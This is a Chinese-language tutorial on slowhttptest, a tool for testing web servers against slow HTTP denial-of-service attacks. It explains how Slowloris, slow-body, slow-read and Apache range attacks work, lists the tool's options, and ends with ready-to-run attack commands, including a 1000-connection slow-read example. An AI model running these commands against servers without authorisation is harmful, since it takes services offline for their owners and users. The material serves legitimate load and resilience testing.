slowhttptest

slowhttptest源码
SlowHTTPTest是一个高度可定制化的压力测试工具
本质上是利用/构造各种特殊的HTTP请求尝试让服务器过载或者拒绝服务
可以运行于各大Linux以及windows平台
该软件被主流包管理器支持,可以直接使用apt安装
```
apt install -y slowhttptest
```

0x1 原理

slowhttptest依赖HTTP服务的一个基本原理:

服务器会在完整的接收HTTP请求后在进行处理
如果HTTP请求一直在传输,即使速率很低,服务器也会分配资源用于处理这个请求
当大量的低效HTTP请求与服务器建立链接,就会导致拒绝服务
基于这个原理的拒绝服务并不会占用服务很高的CPU,只是单纯的拖延服务器时间

攻击细节:

目标服务器的接收缓冲区需要比发送缓冲区小,越小越好
攻击者攻击的目标应该超出服务器的发送缓冲区大小(通常为64-128KB)
可以使用slowhttptest -k填满服务器缓冲区

0x2 参数

先使用-h查看帮助信息

# slowhttptest -h

slowhttptest, a tool to test for slow HTTP DoS vulnerabilities - version 1.6
Usage: slowhttptest [options ...]
Test modes:
  -H               slow headers a.k.a. Slowloris (default)
  -B               slow body a.k.a R-U-Dead-Yet
  -R               range attack a.k.a Apache killer
  -X               slow read a.k.a Slow Read

Reporting options:

  -g               generate statistics with socket state changes (off)
  -o file_prefix   save statistics output in file.html and file.csv (-g required)
  -v level         verbosity level 0-4: Fatal, Info, Error, Warning, Debug

General options:

  -c connections   target number of connections (50)
  -i seconds       interval between followup data in seconds (10)
  -l seconds       target test length in seconds (240)
  -r rate          connections per seconds (50)
  -s bytes         value of Content-Length header if needed (4096)
  -t verb          verb to use in request, default to GET for
                   slow headers and response and to POST for slow body
  -u URL           absolute URL of target (http://localhost/)
  -x bytes         max length of each randomized name/value pair of
                   followup data per tick, e.g. -x 2 generates
                   X-xx: xx for header or &xx=xx for body, where x
                   is random character (32)
  -f content-type  value of Content-type header (application/x-www-form-urlencoded)
  -m accept        value of Accept header (text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5)

Probe/Proxy options:

  -d host:port     all traffic directed through HTTP proxy at host:port (off)
  -e host:port     probe traffic directed through HTTP proxy at host:port (off)
  -p seconds       timeout to wait for HTTP response on probe connection,
                   after which server is considered inaccessible (5)

Range attack specific options:

  -a start        left boundary of range in range header (5)
  -b bytes        limit for range header right boundary values (2000)

Slow read specific options:

  -k num          number of times to repeat same request in the connection. Use to
                  multiply response size if server supports persistent connections (1)
  -n seconds      interval between read operations from recv buffer in seconds (1)
  -w bytes        start of the range advertised window size would be picked from (1)
  -y bytes        end of the range advertised window size would be picked from (512)
  -z bytes        bytes to slow read from receive buffer with single read() call (5)

关键参数如下:

-H:通过header攻击
正常完整的http请求是以\r\n\r\n结尾的,但是slowloris只发送\r\n
-B:通过body攻击
利用了Content-Length这个参数,声明一个很大的Content-Length,导致body部分发送缓慢
-X:通过read攻击
向目标服务器发送一个请求,请求一个很大的文件,但是慢速读取响应数据,使得文件长期滞留于目标服务器中,耗尽资源,通过调整TCP窗口大小(很小),使目标服务器慢速返回数据
-R:通过CVE-2011-3192进行攻击,主要针对如下apache版本
1. 1.3.x
2. 2.0.x -> 2.0.64
3. 2.2.x -> 2.2.19
-u:指定攻击url
-c:并发攻击数量
-g:生成关键日志
-o:将关键日志保存到文件并且生成html图标报告,需要配合-g
-r:每秒创建多少链接
-w 512 -y 1024:每个链接初始化syn时设置随机窗口大小为512 -1024
-n 5 -z 32:每5秒接受32字节的数据
-k:重返因子.自动重放每个攻击请求多少次
-p:设定秒数,等待-p秒后没有获得服务器数据,判定服务器DoSed

0x3 攻击demo

slowhttptest的攻击指令格式一般如下

slowhttptest -H -u http://10.25.153.231/index.html

根据需求也可以创建暴力型的攻击方式
```
slowhttptest -c 1000 -X \
-g -o slow_read_stats -r 200 \
-w 512 -y 1024 \
-n 5 -z 32 -k 3 \
-u https://myseceureserver/resources/index.html -p 3 
```
- 每秒创建200个攻击链接,最多1000个攻击链接,每个链接的随机窗口大小为512->1024,每5秒接受服务器32字节的数据,每个攻击请求发送三次,服务器连续3秒无响应判定为dos成功
如果使用-g -o生成图表那么会生成html文件,看到如下结果:

slowhttptest 应用层http 拒绝服务